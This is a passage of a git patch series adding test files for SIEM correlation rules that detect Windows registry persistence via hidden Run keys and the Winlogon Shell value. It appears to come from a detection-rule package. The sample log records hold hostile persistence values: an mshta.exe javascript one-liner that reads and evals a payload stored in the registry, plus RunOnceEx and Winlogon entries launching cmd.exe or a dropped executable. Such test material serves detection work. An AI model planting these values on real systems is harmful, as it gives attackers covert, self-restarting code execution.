"event_src.rule": "Persistence - Hidden Run value detected", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_Hidden_Run_key_value|msedgewin10|a.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\tasks\\taskhost.exe\"", "object.path": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\public\\tools\\evasion\\a.exe", "subject.process.guid": "747f3d96-8fd2-5f00-0000-0010c15d2200", "subject.process.id": "3728", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\public\\tools\\evasion\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc new file mode 100644 index 00000000..1ff39eb6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:38:16.4543484Z\"},\"EventRecordID\":\"48191421\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3636\",\"ThreadID\":\"4616\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"T1547_001,Create Persistance: Registry Run Keys\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-12 18:38:16.439\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-6613-6487-dc09-00000000c100}\"},{\"Name\":\"ProcessId\",\"text\":\"11532\"},{\"Name\":\"Image\",\"text\":\"E:\\\\work\\\\projects\\\\InvisiblePersistence\\\\InvisibleKeys\\\\x64\\\\Release\\\\InvisibleRegKeys.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKU\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\"},{\"Name\":\"Details\",\"text\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\mshta.exe\\\" \\\"javascript:z1kHl=\\\"SiBZQ\\\";I6M2=new ActiveXObject(\\\"WScript.Shell\\\");qs0Nn=\\\"2BEh4hFR\\\";lEgt9=I6M2.RegRead(\\\"HKCU\\\\\\\\software\\\\\\\\WUV\\\\\\\\Tethering\\\");dpP1iXav=\\\"hX9bkPRH\\\";eval(lEgt9);nro9M=\\\"ioQzi30v\\\";\\\"\"},{\"Name\":\"User\",\"text\":\"STAND2008\\\\Администратор\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\system32\\mshta.exe\" \"javascript:z1khl=\"sibzq\";i6m2=new activexobject(\"wscript.shell\");qs0nn=\"2beh4hfr\";legt9=i6m2.regread(\"hkcu\\\\software\\\\wuv\\\\tethering\");dpp1ixav=\"hx9bkprh\";eval(legt9);nro9m=\"ioqzi30v\";\"", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:20:52.205Z", "status": "success", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\invisibleregkeys.exe", "subject.process.guid": "2b856446-6613-6487-dc09-00000000c100", "subject.process.id": "11532", "subject.process.name": "invisibleregkeys.exe", "subject.process.path": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:38:16.439Z", "type": "raw", "uuid": "355b22a5-48d0-40ab-aaa3-0d5aae285250"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:30:05.5025934Z\"},\"EventRecordID\":\"48184711\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3636\",\"ThreadID\":\"4616\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"T1547_001,Create Persistance: Registry Run Keys\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-12 18:30:05.499\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-642d-6487-a509-00000000c100}\"},{\"Name\":\"ProcessId\",\"text\":\"12488\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\reg.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunonceEx\\\\Line1\"},{\"Name\":\"Details\",\"text\":\"||c:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"User\",\"text\":\"STAND2008\\\\Администратор\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonceex\\line1", "object.name": "line1", "object.new_value": "||c:\\windows\\system32\\cmd.exe", "object.path": "\\registry\\machine\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonceex\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:20:52.206Z", "status": "success", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "c:\\windows\\system32\\reg.exe", "subject.process.guid": "2b856446-642d-6487-a509-00000000c100", "subject.process.id": "12488", "subject.process.name": "reg.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:30:05.499Z", "type": "raw", "uuid": "09245b1b-23b0-4de5-bcb1-2b7623fedc21"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "correlation_name": "Create_persist_via_Hidden_Run_key_value", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_Hidden_Run_key_value|win10-work.stand2008.local|invisibleregkeys.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\system32\\mshta.exe\" \"javascript:z1khl=\"sibzq\";i6m2=new activexobject(\"wscript.shell\");qs0nn=\"2beh4hfr\";legt9=i6m2.regread(\"hkcu\\\\software\\\\wuv\\\\tethering\");dpp1ixav=\"hx9bkprh\";eval(legt9);nro9m=\"ioqzi30v\";\"", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\invisibleregkeys.exe", "subject.process.guid": "2b856446-6613-6487-dc09-00000000c100", "subject.process.id": "11532", "subject.process.name": "invisibleregkeys.exe", "subject.process.path": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc new file mode 100644 index 00000000..152dc962 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:38:16.4541169Z\"},\"EventRecordID\":\"27723336\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"12384\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x4c7672\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\USER\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"},{\"Name\":\"ObjectValueName\"},{\"Name\":\"HandleId\",\"text\":\"0x46004f00530000\"},{\"Name\":\"OperationType\",\"text\":\"TWARE\\\\\"},{\"Name\":\"OldValueType\",\"text\":\"°\"},{\"Name\":\"OldValue\"},{\"Name\":\"NewValueType\"},{\"Name\":\"NewValue\",\"text\":\"%%1904\"},{\"Name\":\"ProcessId\",\"text\":\"0x2d0000002d\"},{\"Name\":\"ProcessName\",\"text\":\"%%1873\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "%%1904", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:31:34.631Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "5011058", "subject.process.fullpath": "%%1873", "subject.process.name": "%%1873", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:38:16.454Z", "type": "raw", "uuid": "fcb41669-3b01-4f60-ac0c-e7e34b38d3b1"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:39:17.9066951Z\"},\"EventRecordID\":\"27724621\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"5664\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x4c7672\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\USER\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"},{\"Name\":\"ObjectValueName\"},{\"Name\":\"HandleId\",\"text\":\"0x46004f00530000\"},{\"Name\":\"OperationType\",\"text\":\"TWARE\\\\\"},{\"Name\":\"OldValueType\",\"text\":\"°\"},{\"Name\":\"OldValue\"},{\"Name\":\"NewValueType\"},{\"Name\":\"NewValue\",\"text\":\"%%1906\"},{\"Name\":\"ProcessId\",\"text\":\"0x38003100250025\"},{\"Name\":\"ProcessName\",\"text\":\"73\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "%%1906", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:31:34.632Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "5011058", "subject.process.fullpath": "73", "subject.process.name": "73", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:39:17.906Z", "type": "raw", "uuid": "c955449d-632d-4905-b52c-d69e843f8371"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "correlation_name": "Create_persist_via_Hidden_Run_key_value", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_Hidden_Run_key_value|win10-work.stand2008.local|%%1873", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "%%1904", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run", "object.property": "value", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "5011058", "subject.process.fullpath": "%%1873", "subject.process.name": "%%1873", "subject.process.path": ""} From 5d0ebad5d8446755f7c52c37bad84590048f8897 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:06:34 +0300 Subject: [PATCH 42/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Create?= =?UTF-8?q?=5Fpersist=5Fvia=5FWinlogonShell)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Create_persist_via_WinlogonShell/tests/test_1.sc | 4 ++++ .../Create_persist_via_WinlogonShell/tests/test_2.sc | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc new file mode 100644 index 00000000..f90019a9 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-06-14T22:22:21.5352457Z\"},\"EventRecordID\":\"7532\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1960\",\"ThreadID\":\"288\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Persistence - Winlogon Shell\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-06-14 22:22:21.519\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1e19-5d04-0000-0010dfc60a00}\"},{\"Name\":\"ProcessId\",\"text\":\"4020\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Downloads\\\\a.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKU\\\\S-1-5-21-3583694148-1414552638-2922671848-1000\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\"},{\"Name\":\"Details\",\"text\":\"\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\9QxTsAU9w8gyPj4w\\\\BRE6BgE2JubB.exe\\\",explorer.exe\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Persistence - Winlogon Shell", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "\"c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe\",explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T11:42:28.474Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\downloads\\a.exe", "subject.process.guid": "365abb72-1e19-5d04-0000-0010dfc60a00", "subject.process.id": "4020", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\ieuser\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-06-14T22:22:21.519Z", "type": "raw", "uuid": "6e66670d-b0b9-4457-8552-6bebc5dfcfbf"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Create_persist_via_WinlogonShell", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Persistence - Winlogon Shell", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_WinlogonShell|iewin7|a.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "\"c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe\",explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\downloads\\a.exe", "subject.process.id": "4020", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\ieuser\\downloads\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc new file mode 100644 index 00000000..5259e5bf --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-02T12:14:16.1854466Z\"},\"EventRecordID\":\"25854299\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"3856\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x26ed88\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\USER\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\"},{\"Name\":\"ObjectValueName\",\"text\":\"Shell\"},{\"Name\":\"HandleId\",\"text\":\"0xc0\"},{\"Name\":\"OperationType\",\"text\":\"%%1904\"},{\"Name\":\"OldValueType\",\"text\":\"-\"},{\"Name\":\"OldValue\",\"text\":\"-\"},{\"Name\":\"NewValueType\",\"text\":\"%%1873\"},{\"Name\":\"NewValue\",\"text\":\"c:\\\\windows\\\\system32\\\\cmd.exe, explorer.exe\"},{\"Name\":\"ProcessId\",\"text\":\"0x2078\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\reg.exe\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "c:\\windows\\system32\\cmd.exe, explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon", "object.property": "value", "object.value": "-", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T12:24:03.952Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "2551176", "subject.process.fullpath": "C:\\Windows\\System32\\reg.exe", "subject.process.name": "reg.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-02T12:14:16.185Z", "type": "raw", "uuid": "66cc727a-80f6-40a6-8b57-5f2a9272ac55"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": 